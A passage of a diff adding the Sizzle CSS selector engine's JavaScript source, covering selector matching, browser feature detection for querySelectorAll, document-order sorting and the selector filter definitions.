getElementById can match elements by name instead of ID + if ( elem.id === m ) { + results.push( elem ); + return results; + } + } else { + return results; + } + + // Element context + } else { + + // Support: IE, Opera, Webkit + // TODO: identify versions + // getElementById can match elements by name instead of ID + if ( newContext && ( elem = newContext.getElementById( m ) ) && + contains( context, elem ) && + elem.id === m ) { + + results.push( elem ); + return results; + } + } + + // Type selector + } else if ( match[ 2 ] ) { + push.apply( results, context.getElementsByTagName( selector ) ); + return results; + + // Class selector + } else if ( ( m = match[ 3 ] ) && support.getElementsByClassName && + context.getElementsByClassName ) { + + push.apply( results, context.getElementsByClassName( m ) ); + return results; + } + } + + // Take advantage of querySelectorAll + if ( support.qsa && + !nonnativeSelectorCache[ selector + " " ] && + ( !rbuggyQSA || !rbuggyQSA.test( selector ) ) && + + // Support: IE 8 only + // Exclude object elements + ( nodeType !== 1 || context.nodeName.toLowerCase() !== "object" ) ) { + + newSelector = selector; + newContext = context; + + // qSA considers elements outside a scoping root when evaluating child or + // descendant combinators, which is not what we want. + // In such cases, we work around the behavior by prefixing every selector in the + // list with an ID selector referencing the scope context. + // The technique has to be used as well when a leading combinator is used + // as such selectors are not recognized by querySelectorAll. + // Thanks to Andrew Dupont for this technique. + if ( nodeType === 1 && + ( rdescend.test( selector ) || rcombinators.test( selector ) ) ) { + + // Expand context for sibling selectors + newContext = rsibling.test( selector ) && testContext( context.parentNode ) || + context; + + // We can use :scope instead of the ID hack if the browser + // supports it & if we're not changing the context. + if ( newContext !== context || !support.scope ) { + + // Capture the context ID, setting it first if necessary + if ( ( nid = context.getAttribute( "id" ) ) ) { + nid = nid.replace( rcssescape, fcssescape ); + } else { + context.setAttribute( "id", ( nid = expando ) ); + } + } + + // Prefix every selector in the list + groups = tokenize( selector ); + i = groups.length; + while ( i-- ) { + groups[ i ] = ( nid ? "#" + nid : ":scope" ) + " " + + toSelector( groups[ i ] ); + } + newSelector = groups.join( "," ); + } + + try { + push.apply( results, + newContext.querySelectorAll( newSelector ) + ); + return results; + } catch ( qsaError ) { + nonnativeSelectorCache( selector, true ); + } finally { + if ( nid === expando ) { + context.removeAttribute( "id" ); + } + } + } + } + } + + // All others + return select( selector.replace( rtrim, "$1" ), context, results, seed ); +} + +/** + * Create key-value caches of limited size + * @returns {function(string, object)} Returns the Object data after storing it on itself with + * property name the (space-suffixed) string and (if the cache is larger than Expr.cacheLength) + * deleting the oldest entry + */ +function createCache() { + var keys = []; + + function cache( key, value ) { + + // Use (key + " ") to avoid collision with native prototype properties (see Issue #157) + if ( keys.push( key + " " ) > Expr.cacheLength ) { + + // Only keep the most recent entries + delete cache[ keys.shift() ]; + } + return ( cache[ key + " " ] = value ); + } + return cache; +} + +/** + * Mark a function for special use by Sizzle + * @param {Function} fn The function to mark + */ +function markFunction( fn ) { + fn[ expando ] = true; + return fn; +} + +/** + * Support testing using an element + * @param {Function} fn Passed the created element and returns a boolean result + */ +function assert( fn ) { + var el = document.createElement( "fieldset" ); + + try { + return !!fn( el ); + } catch ( e ) { + return false; + } finally { + + // Remove from its parent by default + if ( el.parentNode ) { + el.parentNode.removeChild( el ); + } + + // release memory in IE + el = null; + } +} + +/** + * Adds the same handler for all of the specified attrs + * @param {String} attrs Pipe-separated list of attributes + * @param {Function} handler The method that will be applied + */ +function addHandle( attrs, handler ) { + var arr = attrs.split( "|" ), + i = arr.length; + + while ( i-- ) { + Expr.attrHandle[ arr[ i ] ] = handler; + } +} + +/** + * Checks document order of two siblings + * @param {Element} a + * @param {Element} b + * @returns {Number} Returns less than 0 if a precedes b, greater than 0 if a follows b + */ +function siblingCheck( a, b ) { + var cur = b && a, + diff = cur && a.nodeType === 1 && b.nodeType === 1 && + a.sourceIndex - b.sourceIndex; + + // Use IE sourceIndex if available on both nodes + if ( diff ) { + return diff; + } + + // Check if b follows a + if ( cur ) { + while ( ( cur = cur.nextSibling ) ) { + if ( cur === b ) { + return -1; + } + } + } + + return a ? 1 : -1; +} + +/** + * Returns a function to use in pseudos for input types + * @param {String} type + */ +function createInputPseudo( type ) { + return function( elem ) { + var name = elem.nodeName.toLowerCase(); + return name === "input" && elem.type === type; + }; +} + +/** + * Returns a function to use in pseudos for buttons + * @param {String} type + */ +function createButtonPseudo( type ) { + return function( elem ) { + var name = elem.nodeName.toLowerCase(); + return ( name === "input" || name === "button" ) && elem.type === type; + }; +} + +/** + * Returns a function to use in pseudos for :enabled/:disabled + * @param {Boolean} disabled true for :disabled; false for :enabled + */ +function createDisabledPseudo( disabled ) { + + // Known :disabled false positives: fieldset[disabled] > legend:nth-of-type(n+2) :can-disable + return function( elem ) { + + // Only certain elements can match :enabled or :disabled + // https://html.spec.whatwg.org/multipage/scripting.html#selector-enabled + // https://html.spec.whatwg.org/multipage/scripting.html#selector-disabled + if ( "form" in elem ) { + + // Check for inherited disabledness on relevant non-disabled elements: + // * listed form-associated elements in a disabled fieldset + // https://html.spec.whatwg.org/multipage/forms.html#category-listed + // https://html.spec.whatwg.org/multipage/forms.html#concept-fe-disabled + // * option elements in a disabled optgroup + // https://html.spec.whatwg.org/multipage/forms.html#concept-option-disabled + // All such elements have a "form" property. + if ( elem.parentNode && elem.disabled === false ) { + + // Option elements defer to a parent optgroup if present + if ( "label" in elem ) { + if ( "label" in elem.parentNode ) { + return elem.parentNode.disabled === disabled; + } else { + return elem.disabled === disabled; + } + } + + // Support: IE 6 - 11 + // Use the isDisabled shortcut property to check for disabled fieldset ancestors + return elem.isDisabled === disabled || + + // Where there is no isDisabled, check manually + /* jshint -W018 */ + elem.isDisabled !== !disabled && + inDisabledFieldset( elem ) === disabled; + } + + return elem.disabled === disabled; + + // Try to winnow out elements that can't be disabled before trusting the disabled property. + // Some victims get caught in our net (label, legend, menu, track), but it shouldn't + // even exist on them, let alone have a boolean value. + } else if ( "label" in elem ) { + return elem.disabled === disabled; + } + + // Remaining elements are neither :enabled nor :disabled + return false; + }; +} + +/** + * Returns a function to use in pseudos for positionals + * @param {Function} fn + */ +function createPositionalPseudo( fn ) { + return markFunction( function( argument ) { + argument = +argument; + return markFunction( function( seed, matches ) { + var j, + matchIndexes = fn( [], seed.length, argument ), + i = matchIndexes.length; + + // Match elements found at the specified indexes + while ( i-- ) { + if ( seed[ ( j = matchIndexes[ i ] ) ] ) { + seed[ j ] = !( matches[ j ] = seed[ j ] ); + } + } + } ); + } ); +} + +/** + * Checks a node for validity as a Sizzle context + * @param {Element|Object=} context + * @returns {Element|Object|Boolean} The input node if acceptable, otherwise a falsy value + */ +function testContext( context ) { + return context && typeof context.getElementsByTagName !== "undefined" && context; +} + +// Expose support vars for convenience +support = Sizzle.support = {}; + +/** + * Detects XML nodes + * @param {Element|Object} elem An element or a document + * @returns {Boolean} True iff elem is a non-HTML XML node + */ +isXML = Sizzle.isXML = function( elem ) { + var namespace = elem.namespaceURI, + docElem = ( elem.ownerDocument || elem ).documentElement; + + // Support: IE <=8 + // Assume HTML when documentElement doesn't yet exist, such as inside loading iframes + // https://bugs.jquery.com/ticket/4833 + return !rhtml.test( namespace || docElem && docElem.nodeName || "HTML" ); +}; + +/** + * Sets document-related variables once based on the current document + * @param {Element|Object} [doc] An element or document object to use to set the document + * @returns {Object} Returns the current document + */ +setDocument = Sizzle.setDocument = function( node ) { + var hasCompare, subWindow, + doc = node ? node.ownerDocument || node : preferredDoc; + + // Return early if doc is invalid or already selected + // Support: IE 11+, Edge 17 - 18+ + // IE/Edge sometimes throw a "Permission denied" error when strict-comparing + // two documents; shallow comparisons work. + // eslint-disable-next-line eqeqeq + if ( doc == document || doc.nodeType !== 9 || !doc.documentElement ) { + return document; + } + + // Update global variables + document = doc; + docElem = document.documentElement; + documentIsHTML = !isXML( document ); + + // Support: IE 9 - 11+, Edge 12 - 18+ + // Accessing iframe documents after unload throws "permission denied" errors (jQuery #13936) + // Support: IE 11+, Edge 17 - 18+ + // IE/Edge sometimes throw a "Permission denied" error when strict-comparing + // two documents; shallow comparisons work. + // eslint-disable-next-line eqeqeq + if ( preferredDoc != document && + ( subWindow = document.defaultView ) && subWindow.top !== subWindow ) { + + // Support: IE 11, Edge + if ( subWindow.addEventListener ) { + subWindow.addEventListener( "unload", unloadHandler, false ); + + // Support: IE 9 - 10 only + } else if ( subWindow.attachEvent ) { + subWindow.attachEvent( "onunload", unloadHandler ); + } + } + + // Support: IE 8 - 11+, Edge 12 - 18+, Chrome <=16 - 25 only, Firefox <=3.6 - 31 only, + // Safari 4 - 5 only, Opera <=11.6 - 12.x only + // IE/Edge & older browsers don't support the :scope pseudo-class. + // Support: Safari 6.0 only + // Safari 6.0 supports :scope but it's an alias of :root there. + support.scope = assert( function( el ) { + docElem.appendChild( el ).appendChild( document.createElement( "div" ) ); + return typeof el.querySelectorAll !== "undefined" && + !el.querySelectorAll( ":scope fieldset div" ).length; + } ); + + /* Attributes + ---------------------------------------------------------------------- */ + + // Support: IE<8 + // Verify that getAttribute really returns attributes and not properties + // (excepting IE8 booleans) + support.attributes = assert( function( el ) { + el.className = "i"; + return !el.getAttribute( "className" ); + } ); + + /* getElement(s)By* + ---------------------------------------------------------------------- */ + + // Check if getElementsByTagName("*") returns only elements + support.getElementsByTagName = assert( function( el ) { + el.appendChild( document.createComment( "" ) ); + return !el.getElementsByTagName( "*" ).length; + } ); + + // Support: IE<9 + support.getElementsByClassName = rnative.test( document.getElementsByClassName ); + + // Support: IE<10 + // Check if getElementById returns elements by name + // The broken getElementById methods don't pick up programmatically-set names, + // so use a roundabout getElementsByName test + support.getById = assert( function( el ) { + docElem.appendChild( el ).id = expando; + return !document.getElementsByName || !document.getElementsByName( expando ).length; + } ); + + // ID filter and find + if ( support.getById ) { + Expr.filter[ "ID" ] = function( id ) { + var attrId = id.replace( runescape, funescape ); + return function( elem ) { + return elem.getAttribute( "id" ) === attrId; + }; + }; + Expr.find[ "ID" ] = function( id, context ) { + if ( typeof context.getElementById !== "undefined" && documentIsHTML ) { + var elem = context.getElementById( id ); + return elem ? [ elem ] : []; + } + }; + } else { + Expr.filter[ "ID" ] = function( id ) { + var attrId = id.replace( runescape, funescape ); + return function( elem ) { + var node = typeof elem.getAttributeNode !== "undefined" && + elem.getAttributeNode( "id" ); + return node && node.value === attrId; + }; + }; + + // Support: IE 6 - 7 only + // getElementById is not reliable as a find shortcut + Expr.find[ "ID" ] = function( id, context ) { + if ( typeof context.getElementById !== "undefined" && documentIsHTML ) { + var node, i, elems, + elem = context.getElementById( id ); + + if ( elem ) { + + // Verify the id attribute + node = elem.getAttributeNode( "id" ); + if ( node && node.value === id ) { + return [ elem ]; + } + + // Fall back on getElementsByName + elems = context.getElementsByName( id ); + i = 0; + while ( ( elem = elems[ i++ ] ) ) { + node = elem.getAttributeNode( "id" ); + if ( node && node.value === id ) { + return [ elem ]; + } + } + } + + return []; + } + }; + } + + // Tag + Expr.find[ "TAG" ] = support.getElementsByTagName ? + function( tag, context ) { + if ( typeof context.getElementsByTagName !== "undefined" ) { + return context.getElementsByTagName( tag ); + + // DocumentFragment nodes don't have gEBTN + } else if ( support.qsa ) { + return context.querySelectorAll( tag ); + } + } : + + function( tag, context ) { + var elem, + tmp = [], + i = 0, + + // By happy coincidence, a (broken) gEBTN appears on DocumentFragment nodes too + results = context.getElementsByTagName( tag ); + + // Filter out possible comments + if ( tag === "*" ) { + while ( ( elem = results[ i++ ] ) ) { + if ( elem.nodeType === 1 ) { + tmp.push( elem ); + } + } + + return tmp; + } + return results; + }; + + // Class + Expr.find[ "CLASS" ] = support.getElementsByClassName && function( className, context ) { + if ( typeof context.getElementsByClassName !== "undefined" && documentIsHTML ) { + return context.getElementsByClassName( className ); + } + }; + + /* QSA/matchesSelector + ---------------------------------------------------------------------- */ + + // QSA and matchesSelector support + + // matchesSelector(:active) reports false when true (IE9/Opera 11.5) + rbuggyMatches = []; + + // qSa(:focus) reports false when true (Chrome 21) + // We allow this because of a bug in IE8/9 that throws an error + // whenever `document.activeElement` is accessed on an iframe + // So, we allow :focus to pass through QSA all the time to avoid the IE error + // See https://bugs.jquery.com/ticket/13378 + rbuggyQSA = []; + + if ( ( support.qsa = rnative.test( document.querySelectorAll ) ) ) { + + // Build QSA regex + // Regex strategy adopted from Diego Perini + assert( function( el ) { + + var input; + + // Select is set to empty string on purpose + // This is to test IE's treatment of not explicitly + // setting a boolean content attribute, + // since its presence should be enough + // https://bugs.jquery.com/ticket/12359 + docElem.appendChild( el ).innerHTML = "" + + ""; + + // Support: IE8, Opera 11-12.16 + // Nothing should be selected when empty strings follow ^= or $= or *= + // The test attribute must be unknown in Opera but "safe" for WinRT + // https://msdn.microsoft.com/en-us/library/ie/hh465388.aspx#attribute_section + if ( el.querySelectorAll( "[msallowcapture^='']" ).length ) { + rbuggyQSA.push( "[*^$]=" + whitespace + "*(?:''|\"\")" ); + } + + // Support: IE8 + // Boolean attributes and "value" are not treated correctly + if ( !el.querySelectorAll( "[selected]" ).length ) { + rbuggyQSA.push( "\\[" + whitespace + "*(?:value|" + booleans + ")" ); + } + + // Support: Chrome<29, Android<4.4, Safari<7.0+, iOS<7.0+, PhantomJS<1.9.8+ + if ( !el.querySelectorAll( "[id~=" + expando + "-]" ).length ) { + rbuggyQSA.push( "~=" ); + } + + // Support: IE 11+, Edge 15 - 18+ + // IE 11/Edge don't find elements on a `[name='']` query in some cases. + // Adding a temporary attribute to the document before the selection works + // around the issue. + // Interestingly, IE 10 & older don't seem to have the issue. + input = document.createElement( "input" ); + input.setAttribute( "name", "" ); + el.appendChild( input ); + if ( !el.querySelectorAll( "[name='']" ).length ) { + rbuggyQSA.push( "\\[" + whitespace + "*name" + whitespace + "*=" + + whitespace + "*(?:''|\"\")" ); + } + + // Webkit/Opera - :checked should return selected option elements + // http://www.w3.org/TR/2011/REC-css3-selectors-20110929/#checked + // IE8 throws error here and will not see later tests + if ( !el.querySelectorAll( ":checked" ).length ) { + rbuggyQSA.push( ":checked" ); + } + + // Support: Safari 8+, iOS 8+ + // https://bugs.webkit.org/show_bug.cgi?id=136851 + // In-page `selector#id sibling-combinator selector` fails + if ( !el.querySelectorAll( "a#" + expando + "+*" ).length ) { + rbuggyQSA.push( ".#.+[+~]" ); + } + + // Support: Firefox <=3.6 - 5 only + // Old Firefox doesn't throw on a badly-escaped identifier. + el.querySelectorAll( "\\\f" ); + rbuggyQSA.push( "[\\r\\n\\f]" ); + } ); + + assert( function( el ) { + el.innerHTML = "" + + ""; + + // Support: Windows 8 Native Apps + // The type and name attributes are restricted during .innerHTML assignment + var input = document.createElement( "input" ); + input.setAttribute( "type", "hidden" ); + el.appendChild( input ).setAttribute( "name", "D" ); + + // Support: IE8 + // Enforce case-sensitivity of name attribute + if ( el.querySelectorAll( "[name=d]" ).length ) { + rbuggyQSA.push( "name" + whitespace + "*[*^$|!~]?=" ); + } + + // FF 3.5 - :enabled/:disabled and hidden elements (hidden elements are still enabled) + // IE8 throws error here and will not see later tests + if ( el.querySelectorAll( ":enabled" ).length !== 2 ) { + rbuggyQSA.push( ":enabled", ":disabled" ); + } + + // Support: IE9-11+ + // IE's :disabled selector does not pick up the children of disabled fieldsets + docElem.appendChild( el ).disabled = true; + if ( el.querySelectorAll( ":disabled" ).length !== 2 ) { + rbuggyQSA.push( ":enabled", ":disabled" ); + } + + // Support: Opera 10 - 11 only + // Opera 10-11 does not throw on post-comma invalid pseudos + el.querySelectorAll( "*,:x" ); + rbuggyQSA.push( ",.*:" ); + } ); + } + + if ( ( support.matchesSelector = rnative.test( ( matches = docElem.matches || + docElem.webkitMatchesSelector || + docElem.mozMatchesSelector || + docElem.oMatchesSelector || + docElem.msMatchesSelector ) ) ) ) { + + assert( function( el ) { + + // Check to see if it's possible to do matchesSelector + // on a disconnected node (IE 9) + support.disconnectedMatch = matches.call( el, "*" ); + + // This should fail with an exception + // Gecko does not error, returns false instead + matches.call( el, "[s!='']:x" ); + rbuggyMatches.push( "!=", pseudos ); + } ); + } + + rbuggyQSA = rbuggyQSA.length && new RegExp( rbuggyQSA.join( "|" ) ); + rbuggyMatches = rbuggyMatches.length && new RegExp( rbuggyMatches.join( "|" ) ); + + /* Contains + ---------------------------------------------------------------------- */ + hasCompare = rnative.test( docElem.compareDocumentPosition ); + + // Element contains another + // Purposefully self-exclusive + // As in, an element does not contain itself + contains = hasCompare || rnative.test( docElem.contains ) ? + function( a, b ) { + var adown = a.nodeType === 9 ? a.documentElement : a, + bup = b && b.parentNode; + return a === bup || !!( bup && bup.nodeType === 1 && ( + adown.contains ? + adown.contains( bup ) : + a.compareDocumentPosition && a.compareDocumentPosition( bup ) & 16 + ) ); + } : + function( a, b ) { + if ( b ) { + while ( ( b = b.parentNode ) ) { + if ( b === a ) { + return true; + } + } + } + return false; + }; + + /* Sorting + ---------------------------------------------------------------------- */ + + // Document order sorting + sortOrder = hasCompare ? + function( a, b ) { + + // Flag for duplicate removal + if ( a === b ) { + hasDuplicate = true; + return 0; + } + + // Sort on method existence if only one input has compareDocumentPosition + var compare = !a.compareDocumentPosition - !b.compareDocumentPosition; + if ( compare ) { + return compare; + } + + // Calculate position if both inputs belong to the same document + // Support: IE 11+, Edge 17 - 18+ + // IE/Edge sometimes throw a "Permission denied" error when strict-comparing + // two documents; shallow comparisons work. + // eslint-disable-next-line eqeqeq + compare = ( a.ownerDocument || a ) == ( b.ownerDocument || b ) ? + a.compareDocumentPosition( b ) : + + // Otherwise we know they are disconnected + 1; + + // Disconnected nodes + if ( compare & 1 || + ( !support.sortDetached && b.compareDocumentPosition( a ) === compare ) ) { + + // Choose the first element that is related to our preferred document + // Support: IE 11+, Edge 17 - 18+ + // IE/Edge sometimes throw a "Permission denied" error when strict-comparing + // two documents; shallow comparisons work. + // eslint-disable-next-line eqeqeq + if ( a == document || a.ownerDocument == preferredDoc && + contains( preferredDoc, a ) ) { + return -1; + } + + // Support: IE 11+, Edge 17 - 18+ + // IE/Edge sometimes throw a "Permission denied" error when strict-comparing + // two documents; shallow comparisons work. + // eslint-disable-next-line eqeqeq + if ( b == document || b.ownerDocument == preferredDoc && + contains( preferredDoc, b ) ) { + return 1; + } + + // Maintain original order + return sortInput ? + ( indexOf( sortInput, a ) - indexOf( sortInput, b ) ) : + 0; + } + + return compare & 4 ? -1 : 1; + } : + function( a, b ) { + + // Exit early if the nodes are identical + if ( a === b ) { + hasDuplicate = true; + return 0; + } + + var cur, + i = 0, + aup = a.parentNode, + bup = b.parentNode, + ap = [ a ], + bp = [ b ]; + + // Parentless nodes are either documents or disconnected + if ( !aup || !bup ) { + + // Support: IE 11+, Edge 17 - 18+ + // IE/Edge sometimes throw a "Permission denied" error when strict-comparing + // two documents; shallow comparisons work. + /* eslint-disable eqeqeq */ + return a == document ? -1 : + b == document ? 1 : + /* eslint-enable eqeqeq */ + aup ? -1 : + bup ? 1 : + sortInput ? + ( indexOf( sortInput, a ) - indexOf( sortInput, b ) ) : + 0; + + // If the nodes are siblings, we can do a quick check + } else if ( aup === bup ) { + return siblingCheck( a, b ); + } + + // Otherwise we need full lists of their ancestors for comparison + cur = a; + while ( ( cur = cur.parentNode ) ) { + ap.unshift( cur ); + } + cur = b; + while ( ( cur = cur.parentNode ) ) { + bp.unshift( cur ); + } + + // Walk down the tree looking for a discrepancy + while ( ap[ i ] === bp[ i ] ) { + i++; + } + + return i ? + + // Do a sibling check if the nodes have a common ancestor + siblingCheck( ap[ i ], bp[ i ] ) : + + // Otherwise nodes in our document sort first + // Support: IE 11+, Edge 17 - 18+ + // IE/Edge sometimes throw a "Permission denied" error when strict-comparing + // two documents; shallow comparisons work. + /* eslint-disable eqeqeq */ + ap[ i ] == preferredDoc ? -1 : + bp[ i ] == preferredDoc ? 1 : + /* eslint-enable eqeqeq */ + 0; + }; + + return document; +}; + +Sizzle.matches = function( expr, elements ) { + return Sizzle( expr, null, null, elements ); +}; + +Sizzle.matchesSelector = function( elem, expr ) { + setDocument( elem ); + + if ( support.matchesSelector && documentIsHTML && + !nonnativeSelectorCache[ expr + " " ] && + ( !rbuggyMatches || !rbuggyMatches.test( expr ) ) && + ( !rbuggyQSA || !rbuggyQSA.test( expr ) ) ) { + + try { + var ret = matches.call( elem, expr ); + + // IE 9's matchesSelector returns false on disconnected nodes + if ( ret || support.disconnectedMatch || + + // As well, disconnected nodes are said to be in a document + // fragment in IE 9 + elem.document && elem.document.nodeType !== 11 ) { + return ret; + } + } catch ( e ) { + nonnativeSelectorCache( expr, true ); + } + } + + return Sizzle( expr, document, null, [ elem ] ).length > 0; +}; + +Sizzle.contains = function( context, elem ) { + + // Set document vars if needed + // Support: IE 11+, Edge 17 - 18+ + // IE/Edge sometimes throw a "Permission denied" error when strict-comparing + // two documents; shallow comparisons work. + // eslint-disable-next-line eqeqeq + if ( ( context.ownerDocument || context ) != document ) { + setDocument( context ); + } + return contains( context, elem ); +}; + +Sizzle.attr = function( elem, name ) { + + // Set document vars if needed + // Support: IE 11+, Edge 17 - 18+ + // IE/Edge sometimes throw a "Permission denied" error when strict-comparing + // two documents; shallow comparisons work. + // eslint-disable-next-line eqeqeq + if ( ( elem.ownerDocument || elem ) != document ) { + setDocument( elem ); + } + + var fn = Expr.attrHandle[ name.toLowerCase() ], + + // Don't get fooled by Object.prototype properties (jQuery #13807) + val = fn && hasOwn.call( Expr.attrHandle, name.toLowerCase() ) ? + fn( elem, name, !documentIsHTML ) : + undefined; + + return val !== undefined ? + val : + support.attributes || !documentIsHTML ? + elem.getAttribute( name ) : + ( val = elem.getAttributeNode( name ) ) && val.specified ? + val.value : + null; +}; + +Sizzle.escape = function( sel ) { + return ( sel + "" ).replace( rcssescape, fcssescape ); +}; + +Sizzle.error = function( msg ) { + throw new Error( "Syntax error, unrecognized expression: " + msg ); +}; + +/** + * Document sorting and removing duplicates + * @param {ArrayLike} results + */ +Sizzle.uniqueSort = function( results ) { + var elem, + duplicates = [], + j = 0, + i = 0; + + // Unless we *know* we can detect duplicates, assume their presence + hasDuplicate = !support.detectDuplicates; + sortInput = !support.sortStable && results.slice( 0 ); + results.sort( sortOrder ); + + if ( hasDuplicate ) { + while ( ( elem = results[ i++ ] ) ) { + if ( elem === results[ i ] ) { + j = duplicates.push( i ); + } + } + while ( j-- ) { + results.splice( duplicates[ j ], 1 ); + } + } + + // Clear input after sorting to release objects + // See https://github.com/jquery/sizzle/pull/225 + sortInput = null; + + return results; +}; + +/** + * Utility function for retrieving the text value of an array of DOM nodes + * @param {Array|Element} elem + */ +getText = Sizzle.getText = function( elem ) { + var node, + ret = "", + i = 0, + nodeType = elem.nodeType; + + if ( !nodeType ) { + + // If no nodeType, this is expected to be an array + while ( ( node = elem[ i++ ] ) ) { + + // Do not traverse comment nodes + ret += getText( node ); + } + } else if ( nodeType === 1 || nodeType === 9 || nodeType === 11 ) { + + // Use textContent for elements + // innerText usage removed for consistency of new lines (jQuery #11153) + if ( typeof elem.textContent === "string" ) { + return elem.textContent; + } else { + + // Traverse its children + for ( elem = elem.firstChild; elem; elem = elem.nextSibling ) { + ret += getText( elem ); + } + } + } else if ( nodeType === 3 || nodeType === 4 ) { + return elem.nodeValue; + } + + // Do not include comment or processing instruction nodes + + return ret; +}; + +Expr = Sizzle.selectors = { + + // Can be adjusted by the user + cacheLength: 50, + + createPseudo: markFunction, + + match: matchExpr, + + attrHandle: {}, + + find: {}, + + relative: { + ">": { dir: "parentNode", first: true }, + " ": { dir: "parentNode" }, + "+": { dir: "previousSibling", first: true }, + "~": { dir: "previousSibling" } + }, + + preFilter: { + "ATTR": function( match ) { + match[ 1 ] = match[ 1 ].replace( runescape, funescape ); + + // Move the given value to match[3] whether quoted or unquoted + match[ 3 ] = ( match[ 3 ] || match[ 4 ] || + match[ 5 ] || "" ).replace( runescape, funescape ); + + if ( match[ 2 ] === "~=" ) { + match[ 3 ] = " " + match[ 3 ] + " "; + } + + return match.slice( 0, 4 ); + }, + + "CHILD": function( match ) { + + /* matches from matchExpr["CHILD"] + 1 type (only|nth|...) + 2 what (child|of-type) + 3 argument (even|odd|\d*|\d*n([+-]\d+)?|...) + 4 xn-component of xn+y argument ([+-]?\d*n|) + 5 sign of xn-component + 6 x of xn-component + 7 sign of y-component + 8 y of y-component + */ + match[ 1 ] = match[ 1 ].toLowerCase(); + + if ( match[ 1 ].slice( 0, 3 ) === "nth" ) { + + // nth-* requires argument + if ( !match[ 3 ] ) { + Sizzle.error( match[ 0 ] ); + } + + // numeric x and y parameters for Expr.filter.CHILD + // remember that false/true cast respectively to 0/1 + match[ 4 ] = +( match[ 4 ] ? + match[ 5 ] + ( match[ 6 ] || 1 ) : + 2 * ( match[ 3 ] === "even" || match[ 3 ] === "odd" ) ); + match[ 5 ] = +( ( match[ 7 ] + match[ 8 ] ) || match[ 3 ] === "odd" ); + + // other types prohibit arguments + } else if ( match[ 3 ] ) { + Sizzle.error( match[ 0 ] ); + } + + return match; + }, + + "PSEUDO": function( match ) { + var excess, + unquoted = !match[ 6 ] && match[ 2 ]; + + if ( matchExpr[ "CHILD" ].test( match[ 0 ] ) ) { + return null; + } + + // Accept quoted arguments as-is + if ( match[ 3 ] ) { + match[ 2 ] = match[ 4 ] || match[ 5 ] || ""; + + // Strip excess characters from unquoted arguments + } else if ( unquoted && rpseudo.test( unquoted ) && + + // Get excess from tokenize (recursively) + ( excess = tokenize( unquoted, true ) ) && + + // advance to the next closing parenthesis + ( excess = unquoted.indexOf( ")", unquoted.length - excess ) - unquoted.length ) ) { + + // excess is a negative index + match[ 0 ] = match[ 0 ].slice( 0, excess ); + match[ 2 ] = unquoted.slice( 0, excess ); + } + + // Return only captures needed by the pseudo filter method (type and argument) + return match.slice( 0, 3 ); + } + }, + + filter: { + + "TAG": function( nodeNameSelector ) { + var nodeName = nodeNameSelector.replace( runescape, funescape ).toLowerCase(); + return nodeNameSelector === "*" ? + function() { + return true; + } : + function( elem ) { + return elem.nodeName && elem.nodeName.toLowerCase() === nodeName; + }; + }, + + "CLASS": function( className ) { + var pattern = classCache[ className + " " ]; + + return pattern || + ( pattern = new RegExp( "(^|" + whitespace + + ")" + className + "(" + whitespace + "|$)" ) ) && classCache( + className, function( elem ) { + return pattern.test( + typeof elem.className === "string" && elem.className || + typeof elem.getAttribute !== "undefined" && + elem.getAttribute( "class" ) || + "" + ); + } ); + }, + + "ATTR": function( name, operator, check ) { + return function( elem ) { + var result = Sizzle.attr( elem, name ); + + if ( result == null ) { + return operator === "!="; + } + if ( !operator ) { + return true; + } + + result += ""; + + /* eslint-disable max-len */ + + return operator === "=" ? result === check : + operator === "!=" ? result !== check : + operator === "^=" ? check && result.indexOf( check ) === 0 : + operator === "*=" ? check && result.indexOf( check ) > -1 : + operator === "$=" ? check && result.slice( -check.length ) === check : + operator === "~=" ? ( " " + result.replace( rwhitespace, " " ) + " " ).indexOf( check ) > -1 : + operator === "|=" ? result === check || result.slice( 0, check.length + 1 ) === check + "-" : + false; + /* eslint-enable max-len */ + + }; + }, + + "CHILD": function( type, what, _argument, first, last ) { + var simple = type.slice( 0, 3 ) !== "nth", + forward = type.slice( -4 ) !== "last", + ofType = what === "of-type"; + + return first === 1 && last === 0 ? + + // Shortcut for :nth-*(n) + function( elem ) { + return !!elem.parentNode; + } : + + function( elem, _context, xml ) { + var cache, uniqueCache, outerCache, node, nodeIndex, start, + dir = simple !== forward ? "nextSibling" : "previousSibling", + parent = elem.parentNode, + name = ofType && elem.nodeName.toLowerCase(), + useCache = !xml && !ofType, + diff = false; + + if ( parent ) { + + // :(first|last|only)-(child|of-type) + if ( simple ) { + while ( dir ) { + node = elem; + while ( ( node = node[ dir ] ) ) { + if ( ofType ? + node.nodeName.toLowerCase() === name : + node.nodeType === 1 ) { + + return false; + } + } + + // Reverse direction for :only-* (if we haven't yet done so) + start = dir = type === "only" && !start && "nextSibling"; + } + return true; + } + + start = [ forward ? parent.firstChild : parent.lastChild ]; + + // non-xml :nth-child(...) stores cache data on `parent` + if ( forward && useCache ) { + + // Seek `elem` from a previously-cached index + + // ...in a gzip-friendly way + node = parent; + outerCache = node[ expando ] || ( node[ expando ] = {} ); + + // Support: IE <9 only + // Defend against cloned attroperties (jQuery gh-1709) + uniqueCache = outerCache[ node.uniqueID ] || + ( outerCache[ node.uniqueID ] = {} ); + + cache = uniqueCache[ type ] || []; + nodeIndex = cache[ 0 ] === dirruns && cache[ 1 ]; + diff = nodeIndex && cache[ 2 ]; + node = nodeIndex && parent.childNodes[ nodeIndex ]; + + while ( ( node = ++nodeIndex && node && node[ dir ] || + + // Fallback to seeking `elem` from the start + ( diff = nodeIndex = 0 ) || start.pop() ) ) { + + // When found, cache indexes on `parent` and break + if ( node.nodeType === 1 && ++diff && node === elem ) { + uniqueCache[ type ] = [ dirruns, nodeIndex, diff ]; + break; + } + } + + } else { + + // Use previously-cached element index if available + if ( useCache ) { + + // ...in a gzip-friendly way + node = elem; + outerCache = node[ expando ] || ( node[ expando ] = {} ); + + // Support: IE <9 only + // Defend against cloned attroperties (jQuery gh-1709) + uniqueCache = outerCache[ node.uniqueID ] || + ( outerCache[ node.uniqueID ] = {} ); + + cache = uniqueCache[ type ] || []; + nodeIndex = cache[ 0 ] === dirruns && cache[ 1 ]; + diff = nodeIndex; + } + + // xml :nth-child(...) + // or :nth-last-child(...) or :nth(-last)?-of-type(...) + if ( diff === false ) { + + // Use the same loop as above to seek `elem` from the start + while ( ( node = ++nodeIndex && node && node[ dir ] || + ( diff = nodeIndex = 0 ) || start.pop() ) ) { + + if ( ( ofType ? + node.nodeName.toLowerCase() === name : + node.nodeType === 1 ) && + ++diff ) { + + // Cache the index of each encountered element + if ( useCache ) { + outerCache = node[ expando ] || + ( node[ expando ] = {} ); + + // Support: IE <9 only + // Defend against cloned attroperties (jQuery gh-1709) + uniqueCache = outerCache[ node.uniqueID ] || + ( outerCache[ node.uniqueID ] = {} ); + + 